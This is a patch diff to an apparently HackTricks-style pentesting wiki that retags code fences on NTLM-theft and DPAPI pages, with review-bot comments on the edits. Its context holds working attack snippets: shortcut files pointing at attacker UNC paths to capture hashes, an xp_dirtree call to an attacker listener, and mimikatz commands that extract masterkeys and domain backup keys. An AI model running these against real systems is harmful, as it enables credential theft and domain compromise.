resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory. -``` +```powershell Set shl = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") currentFolder = shl.CurrentDirectory @@ -254,7 +254,7 @@ sc.Save The Powershell version. -``` +```powershell $objShell = New-Object -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("StealMyHashes.lnk") $lnk.TargetPath = "\\35.164.153.224\@OsandaMalith" 
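Review bot: the `EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1` snippet added to printers-spooler-service-abuse.md should state its preconditions and link back to `abusing-ad-mssql.md`, where the same command is documented in this patch: it needs only a login on the instance (`xp_dirtree` is executable by `public` by default, no sysadmin required), the authentication is made by the SQL Server service account, and `10.10.17.231\pwn` is the attacker's listener. In places-to-steal-ntlm-creds.md the fence-language changes are welcome, but the first block (`Set shl = CreateObject("WScript.Shell")` ... `sc.Save`) is VBScript, not PowerShell; tag it ```vbscript (or ```vb) instead of ```powershell.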
@@ -269,7 +269,7 @@ $lnk.Save() Another shortcut in Windows is the Internet shortcuts. You can save this as something.url -``` +```bash echo [InternetShortcut] > stealMyHashes.url echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url ``` @@ -301,7 +301,7 @@ Start-Process \\192.168.0.1\aa IE will resolve UNC paths. For example -``` +```html ``` diff --git a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md index 5e43105f4..b1d32a6bc 100644 --- a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md +++ b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md @@ -117,7 +117,7 @@ For where you can extract the master key with mimikatz:
# If you know the users password
 dpapi::masterkey /in:"C:\Users\<username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /sid:S-1-5-21-2552734371-813931464-1050690807-1106 /password:123456 /protected
 
-# If you don't
+# If you don't have the users password and inside an AD
 dpapi::masterkey /in:"C:\Users\<username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /rpc
The master key of the file will appear in the output.
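Review bot: the reworded comment `If you don't have the users password and inside an AD` oversells `/rpc`: mimikatz asks the domain controller to unwrap the masterkey through the BackupKey RPC interface (MS-BKRP), and the DC only does so when the caller's SID matches the masterkey owner, so the command has to run in that user's security context (their session, or a `runas /netonly` logon with their credentials), i.e. you already hold their password or ticket. Say instead `If you don't have the password but can run as the user on a domain-joined host`, and mention the offline alternative when you hold domain admin: export the domain backup key with `lsadump::backupkeys /system:<dc> /export` and pass it with `dpapi::masterkey /in:... /pvk:<file>`.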